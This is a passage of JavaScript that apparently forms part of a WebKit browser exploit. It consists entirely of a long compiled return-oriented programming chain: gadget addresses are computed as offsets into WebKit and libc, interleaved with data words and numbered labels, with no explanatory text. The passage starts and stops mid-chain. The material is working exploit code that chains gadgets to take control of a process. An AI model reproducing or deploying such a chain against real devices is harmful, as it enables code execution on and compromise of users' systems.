webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3218:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3219:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3220:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3221:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+196360, //L3222+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+196352, //L3222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3222:
db([0, 0]); // 0x0
set_gadgets([
ropchain+196376, //L3222+24
ropchain+200688, //L3217
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3223:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3225:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+196512, //L3228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196496, //L3226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3226:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3228:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+196600, //L3229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+196616, //L3231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3232:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+196696, //L3234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3234:
db([0, 0]); // 0x0
//L3233:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+196744, //L3236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3236:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3238:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+196864, //L3241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196848, //L3239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3241:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+197008, //L3244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196976, //L3242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+196992, //L3243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3242:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3243:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+197088, //L3245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3245:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3247:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+197208, //L3250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+197192, //L3248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3248:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3250:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+197384, //L3253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+197400, //L3254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+197352, //L3251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+197368, //L3252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3251:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3252:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3253:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3254:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+197560, //L3258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+197528, //L3256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+197544, //L3257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3255:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3256:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3257:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3258:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+197648, //L3259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+197664, //L3260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3259:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3260:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+197840, //L3262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+197856, //L3263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+197824, //L3261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3261:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3262:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3263:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+197968, //L3265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+198016, //L3268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+197984, //L3266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3265:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3266:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3267:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3268:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+198128, //L3269+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+198120, //L3269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3269:
db([0, 0]); // 0x0
set_gadgets([
ropchain+198144, //L3269+24
ropchain+198160, //L3264
libc_base+782311, //pop rsp
ropchain+198176, //L3270
//L3264:
libc_base+782311, //pop rsp
ropchain+200688, //L3271
//L3270:
libc_base+764760, //pop rsi
ropchain+198216, //L3272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3274:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+198336, //L3277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198320, //L3275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3275:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+198480, //L3280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198448, //L3278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+198464, //L3279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3278:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3279:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3280:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+198560, //L3281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3281:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3283:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+198680, //L3286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198664, //L3284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3284:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+198824, //L3289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198792, //L3287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+198808, //L3288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3287:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+198912, //L3291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3290:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3291:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+198968, //L3292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3292:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3294:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+199048, //L3296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3296:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+199160, //L3297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3297:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3299:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+199280, //L3302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199264, //L3300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3300:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3302:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+199424, //L3305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199392, //L3303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+199408, //L3304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3303:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3305:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199504, //L3306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3306:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3307:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L3308:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+199632, //L3310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+199616, //L3309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3309:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3310:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+199712, //L3311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3311:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3313:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+199832, //L3316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199816, //L3314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3314:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3316:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+199912, //L3318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+199944, //L3320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3318:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L3319:
ropchain+200072, //L3317
libc_base+144605 //pop rdi
]);
//L3320:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+200048, //L3322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+200064, //L3321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3322:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3321:
db([0, 0]); // 0x0
//L3317:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L3323:
libc_base+764760, //pop rsi
ropchain+200144, //L3324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3324:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3326:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+200264, //L3329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+200248, //L3327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3327:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3329:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+200408, //L3332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+200376, //L3330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+200392, //L3331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3330:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3331:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3332:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+200496, //L3334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3333:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3334:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+200552, //L3335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3335:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3337:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+200632, //L3339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+196704, //L3233
//L3271:
//L3217:
//L3340:
libc_base+764760, //pop rsi
ropchain+200728, //L3341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3341:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3343:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+200848, //L3346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+200832, //L3344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3344:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3346:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+201040, //L3351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+201056, //L3352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+200992, //L3348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201024, //L3350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3348:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3349:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3350:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3351:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3352:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+201168, //L3353+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+201160, //L3353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3353:
db([0, 0]); // 0x0
set_gadgets([
ropchain+201184, //L3353+24
ropchain+205424, //L3347
libc_base+764760, //pop rsi
ropchain+201224, //L3354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3354:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3356:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+201344, //L3359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201328, //L3357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3357:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3359:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+201488, //L3362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201456, //L3360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+201472, //L3361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3360:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3361:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+201568, //L3363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3363:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3365:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+201688, //L3368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201672, //L3366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3366:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3368:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+201832, //L3371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201800, //L3369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+201816, //L3370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3369:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3370:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3371:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+201920, //L3373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3372:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3373:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+201976, //L3374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3374:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3376:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+202056, //L3378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3378:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202168, //L3379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3379:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3381:
db([24, 0]); // 0x18
